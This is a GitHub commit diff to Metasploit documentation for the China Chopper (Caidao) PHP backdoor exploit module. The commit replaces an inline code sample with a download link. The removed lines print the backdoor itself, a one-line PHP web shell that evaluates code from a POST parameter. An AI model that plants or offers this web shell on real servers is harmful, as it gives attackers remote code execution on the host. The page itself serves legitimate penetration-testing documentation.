You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md
+1-5Lines changed: 1 addition & 5 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -2,11 +2,7 @@ China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye
2
2
3
3
## Vulnerable Application
4
4
5
-
Here is the PHP code of the backdoor that you can use and save it as caidao.php:
6
-
7
-
```
8
-
<?php @eval($_POST["chopper"]);?>
9
-
```
5
+
Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor that you can use and save it as caidao.php.
0 commit comments